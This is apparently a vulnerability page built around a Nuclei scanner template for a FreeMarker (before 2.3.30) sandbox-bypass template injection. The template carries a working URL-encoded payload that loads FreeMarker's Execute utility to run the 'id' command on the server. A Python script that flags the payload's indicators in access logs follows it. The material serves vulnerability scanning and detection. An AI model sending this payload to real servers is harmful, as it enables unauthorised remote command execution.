Vulnerability description
Apache FreeMarker™ is a template engine: a Java library to generate text output (HTML web pages, e-mails, configuration files, source code, etc.) based on templates and changing data. The Nuclei template below targets FreeMarker versions before 2.3.30, where a template expression can reach the class loader through `.class.protectionDomain.classLoader` and instantiate `freemarker.template.utility.Execute` to run a system command; the matcher confirms the injection by looking for the output of the `id` command in the response body.
id: freemarker-sandbox-bypass-ssti

info:
  name: Freemarker < 2.3.30 Sandbox Bypass - Server Side Template Injection
  author: ritikchaddha
  severity: high
  description: |
    Apache FreeMarker™ is a template engine: a Java library to generate text output (HTML web pages, e-mails, configuration files, source code, etc.) based on templates and changing data.
  reference:
    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Java.md#freemarker---sandbox-bypass
  metadata:
    verified: true
  tags: ssti,dast,freemarker,vuln

http:
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'

    payloads:
      injection:
        - "<#assign%20classloader=article.class.protectionDomain.classLoader><#assign%20owc=classloader.loadClass(%22freemarker.template.ObjectWrapper%22)><#assign%20dwf=owc.getField(%22DEFAULT_WRAPPER%22).get(null)><#assign%20ec=classloader.loadClass(%22freemarker.template.utility.Execute%22)>${dwf.newInstance(ec,null)(%22id%22)}"

    fuzzing:
      - part: query
        type: replace
        mode: single
        fuzz:
          - "{{injection}}"

    matchers:
      - type: regex
        part: body
        regex:
          - "uid=[0-9]+.*gid=[0-9]+.*"
# digest: 4a0a00473045022100ac8c10f30a5cdc7e823e21020c162e3905bb3224dc545e42d0af472fe3b9cc3802204b4d959cdab058adf6963fdb8f84eeb01e420b56b927cd2f3a6b9041ec60a4cd:922c64590222798bb761d5b6d8e72950
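The template above fuzzes query-string parameters and then matches the response body against the output of `id`. The following Python script, added here as an example and not part of the Nuclei template or of the FreeMarker project, shows the defender's side of the same two checks: it URL-decodes the query parameters of requests in a web-server access log and flags FreeMarker directive or interpolation syntax and the class-loader chain used by the payload, and it applies the template's own body regex to a response. The log lines, client addresses and indicator names are constructed for the example; the function names are my own.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Indicators of FreeMarker template syntax inside a query-string value. None of
# these belong in ordinary user input; the last three are the pieces of the
# sandbox-bypass chain the Nuclei template above sends.
FREEMARKER_INDICATORS = {
    "directive": re.compile(r"<#\s*\w+", re.I),                      # <#assign ...>, <#list ...>
    "interpolation": re.compile(r"\$\{[^}]*\}"),                       # ${ ... }
    "classloader-chain": re.compile(r"\.class\.protectionDomain\.classLoader", re.I),
    "loadClass": re.compile(r"\bloadClass\s*\(", re.I),
    "execute-utility": re.compile(r"freemarker\.template\.utility\.Execute", re.I),
}

# The template's body matcher: the output of the Unix `id` command.
ID_OUTPUT = re.compile(r"uid=[0-9]+.*gid=[0-9]+.*")

# Common Log Format, enough fields to pull the client and the request target.
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log: a benign request, one carrying the start of the
# class-loader chain, one with a ${...} interpolation and one benign search.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /article?id=42 HTTP/1.1" 200 5123
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /article?id=%3C%23assign%20x%3Darticle.class.protectionDomain.classLoader%3E HTTP/1.1" 200 5123
198.51.100.9 - - [10/Oct/2023:13:55:40 +0000] "GET /search?q=%24%7Bproduct.name%7D HTTP/1.1" 200 880
198.51.100.9 - - [10/Oct/2023:13:55:41 +0000] "GET /search?q=freemarker+tutorial HTTP/1.1" 200 880
"""


def decode_query(target):
    """Return (name, value) pairs of the request target's query string.

    parse_qsl already percent-decodes once; the extra unquote() catches values
    that were encoded twice to slip past a single-decode filter.
    """
    query = urlsplit(target).query
    return [(k, unquote(v)) for k, v in parse_qsl(query, keep_blank_values=True)]


def ssti_indicators(target):
    """Sorted names of FreeMarker indicators found in any decoded query value."""
    found = set()
    for _, value in decode_query(target):
        for name, pattern in FREEMARKER_INDICATORS.items():
            if pattern.search(value):
                found.add(name)
    return sorted(found)


def scan_access_log(text):
    """Return one record per request whose query string carries an indicator."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # unparsable line; a real pipeline would count these
        indicators = ssti_indicators(m.group("target"))
        if indicators:
            hits.append({
                "client": m.group("client"),
                "time": m.group("ts"),
                "target": m.group("target"),
                "indicators": indicators,
            })
    return hits


def id_command_output(body):
    """True when a response body looks like `id` output (the template's matcher)."""
    return bool(ID_OUTPUT.search(body))


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["client"]} {hit["indicators"]} {hit["target"]}')
    print(id_command_output("uid=33(www-data) gid=33(www-data) groups=33(www-data)"))
```

Run against a real access log, the indicator scan is a cheap first pass for spotting this template (or any other FreeMarker SSTI probe) in traffic; the body check mirrors what the scanner itself uses to decide the injection worked, so a response matching it from an endpoint that renders user input is a confirmed finding rather than a probe.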